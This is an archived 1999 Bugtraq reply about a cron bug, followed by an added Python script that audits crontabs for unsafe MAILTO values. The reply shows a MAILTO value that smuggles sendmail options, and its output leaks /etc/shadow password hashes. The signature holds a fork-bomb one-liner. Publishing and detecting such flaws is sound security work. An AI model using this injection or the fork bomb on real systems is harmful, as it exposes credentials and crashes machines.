Bugtraq mailing list archives

Re: [RHSA-1999:030-01] Buffer overflow in cron daemon


From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 5 Jul 1999 03:27:32 +0200


On Wed, 25 Aug 1999, Bill Nottingham wrote:

> To the best of our knowledge, no known exploits exist at this time.
>
> Also, it was possible to use specially formatted 'MAILTO' environment
> variables to send commands to sendmail.

Oh, something from scratch:

[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'

* * * * * nonexistent
[lcamtuf@onehost lcamtuf]$ sleep 60
[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy

_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
To iterate is human, to recurse - divine [P. Deutsch]
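
A defensive check for the issue shown in the post above, as an added example that is not part of the original message or of cron's own code: it scans crontab text for MAILTO values that a mailer would parse as options or extra arguments. The function names and the address allowlist are assumptions made for this illustration.

```python
import re

# cron environment line: NAME = VALUE (job lines start with a digit, '*' or '@')
ENV_LINE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$")
# Assumed policy: local user names or user@host addresses only.
SAFE_ADDR = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.+-]*(@[A-Za-z0-9][A-Za-z0-9.-]*)?$")


def parse_env(line):
    """Return (name, value) for a crontab environment line, else None."""
    m = ENV_LINE.match(line)
    if not m:
        return None
    name, value = m.groups()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        value = value[1:-1]  # one pair of matching quotes is stripped
    return name, value


def mailto_problems(value):
    """List reasons a MAILTO value is unsafe to place on a mailer's argv."""
    problems = []
    if value == "":
        return problems  # empty MAILTO means "send no mail"
    for addr in (a.strip() for a in value.split(",")):
        if addr.startswith("-"):
            problems.append(f"{addr!r}: leading '-' is parsed as a mailer option")
        elif re.search(r"\s", addr):
            problems.append(f"{addr!r}: whitespace splits into extra arguments")
        elif not SAFE_ADDR.match(addr):
            problems.append(f"{addr!r}: characters outside the address allowlist")
    return problems


def audit_crontab(text):
    """Return [(line_number, problem)] for every unsafe MAILTO assignment."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        env = parse_env(line)
        if env and env[0] == "MAILTO":
            findings += [(lineno, p) for p in mailto_problems(env[1])]
    return findings


# Constructed sample; line 1 carries the MAILTO value quoted in the post.
SAMPLE = """MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
MAILTO=ops@example.org, root
MAILTO=""
"""

if __name__ == "__main__":
    for lineno, problem in audit_crontab(SAMPLE):
        print(f"line {lineno}: {problem}")
```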